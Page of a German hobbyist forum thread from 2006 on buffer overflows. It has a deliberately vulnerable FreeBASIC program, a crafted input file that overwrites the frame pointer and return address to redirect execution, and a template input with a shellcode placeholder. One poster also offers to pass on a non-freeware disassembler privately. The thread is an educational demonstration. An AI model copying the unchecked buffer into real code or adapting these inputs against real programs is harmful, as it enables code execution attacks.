Das deutsche QBasic- und FreeBASIC-Forum Foren-Übersicht Das deutsche QBasic- und FreeBASIC-Forum
Für euch erreichbar unter qb-forum.de, fb-forum.de und freebasic-forum.de!
 
FAQFAQ   SuchenSuchen   MitgliederlisteMitgliederliste   BenutzergruppenBenutzergruppen  RegistrierenRegistrieren
ProfilProfil   Einloggen, um private Nachrichten zu lesenEinloggen, um private Nachrichten zu lesen   LoginLogin
Zur Begleitseite des Forums / Chat / Impressum
Aktueller Forenpartner:

Bufferoverflow
Gehe zu Seite Zurück  1, 2
 
Neues Thema eröffnen   Neue Antwort erstellen    Das deutsche QBasic- und FreeBASIC-Forum Foren-Übersicht -> Computer-Forum
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
ChemicalWarfare



Anmeldungsdatum: 15.09.2004
Beiträge: 152
BeitragVerfasst am: 10.01.2006, 21:29    Titel: Antworten mit Zitat
Ich hab dir ein kleines bsp prog geschreiben, welches man mit ner entsprechenden file.txt "exploiten" kann (habs versucht wie ein "realistisches" grinsen prog aussehen zulassen):

Code:
sub ReadData( file as string, buffer() as integer )
  open file for input as #1
  do until eof( 1 ) 'wird nicht abgefragt, wie groß der buffer ist, z.b. mit ubound()
    input #1, buffer( i )
    i += 1
  loop
  close
end sub

sub PrintData( buffer() as integer )
  for i = lbound( buffer ) to ubound( buffer )
    print buffer( i ) & ", ";
  next
end sub

sub main()
  dim buffer( 9 ) as integer 'buffer 0 - 9
  ReadData( "file.txt", buffer() )
  PrintData( buffer() )
end sub

main()
sleep
end 0

print "exploited"
sleep
end 1


und hier die file.txt, die das prog zum print "exploitet" springen lässt:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
0,
4199502

erste zeile: um den buffer zu füllen
zweite zeile: stack frame pointer überschreiben (das push ebp an anfang jeder routine)
drittene zeile: adresse des print "exploited" in der exe (musste mitm disassembler nachgucken, bei mir 0040144E hex, also 4199502 dec)
_________________
Er ist ein Wunder!
Nein, er ist eine Missgeburt.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
Michael Frey



Anmeldungsdatum: 18.12.2004
Beiträge: 2577
Wohnort: Schweiz
BeitragVerfasst am: 11.01.2006, 19:36    Titel: Antworten mit Zitat
Nicht schlecht! Daumen rauf!
Es geht also doch, wenn man jetzt noch etwas weiter dran arbeitet, schaft man es bestimmt noch beliebigen Code einzuschleussen.
_________________
http://de.wikibooks.org/wiki/FreeBasic Jede Hilfe für dieses Buch ist Willkommen!
http://de.wikibooks.org/wiki/FreeBasic:_FAQ FAQ zu Freebasic (im Aufbau, hilfe Willkommen)
Neu mit Syntax Highlight
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
ChemicalWarfare



Anmeldungsdatum: 15.09.2004
Beiträge: 152
BeitragVerfasst am: 12.01.2006, 13:10    Titel: Antworten mit Zitat
Michael Frey hat Folgendes geschrieben:
Nicht schlecht! Daumen rauf!
Es geht also doch, wenn man jetzt noch etwas weiter dran arbeitet, schaft man es bestimmt noch beliebigen Code einzuschleussen.


jup, mann muss nur diese file.txt nehmen:
2425368299, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0,
1245024,
%shellcode%
_________________
Er ist ein Wunder!
Nein, er ist eine Missgeburt.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
Michael Frey



Anmeldungsdatum: 18.12.2004
Beiträge: 2577
Wohnort: Schweiz
BeitragVerfasst am: 12.01.2006, 18:41    Titel: Antworten mit Zitat
Wow!

Mal ne Frage:
Welchen Diasemmbler setzt du eigentlich ein?
Im Internet finde ich recht viel Mist ...
_________________
http://de.wikibooks.org/wiki/FreeBasic Jede Hilfe für dieses Buch ist Willkommen!
http://de.wikibooks.org/wiki/FreeBasic:_FAQ FAQ zu Freebasic (im Aufbau, hilfe Willkommen)
Neu mit Syntax Highlight
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
ChemicalWarfare



Anmeldungsdatum: 15.09.2004
Beiträge: 152
BeitragVerfasst am: 12.01.2006, 21:39    Titel: Antworten mit Zitat
ich benutze folgende:
WDASM 8.93 mit Brat Path 3.0
IDA
Ollydbg
HIEW

du brauchst eigentlich nur IDA (ist nicht freeware, also schreib mir ne pm falls du es haben willst oder such bei google). den rest brauchst du nur, wenn du reverse engineering machen willst.
_________________
Er ist ein Wunder!
Nein, er ist eine Missgeburt.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
Michael Frey



Anmeldungsdatum: 18.12.2004
Beiträge: 2577
Wohnort: Schweiz
BeitragVerfasst am: 13.01.2006, 18:19    Titel: Antworten mit Zitat
Danke, Google wird schon Helfen.
Eine Demo Version hab ich recht schnell gefunden, mal sehen ob's geht:
http://www.datarescue.com/idabase/idadown.htm

Edit:/Die Demo Version ist Mist, aber die Freeware Version von http://www.downloadjunction.com/product/software/69070/ scheint zu gehen.
_________________
http://de.wikibooks.org/wiki/FreeBasic Jede Hilfe für dieses Buch ist Willkommen!
http://de.wikibooks.org/wiki/FreeBasic:_FAQ FAQ zu Freebasic (im Aufbau, hilfe Willkommen)
Neu mit Syntax Highlight
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
Beiträge der letzten Zeit anzeigen:   
Neues Thema eröffnen   Neue Antwort erstellen    Das deutsche QBasic- und FreeBASIC-Forum Foren-Übersicht -> Computer-Forum Alle Zeiten sind GMT + 1 Stunde
Gehe zu Seite Zurück  1, 2
Seite 2 von 2

 
Gehe zu:  
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.

 Impressum :: Datenschutz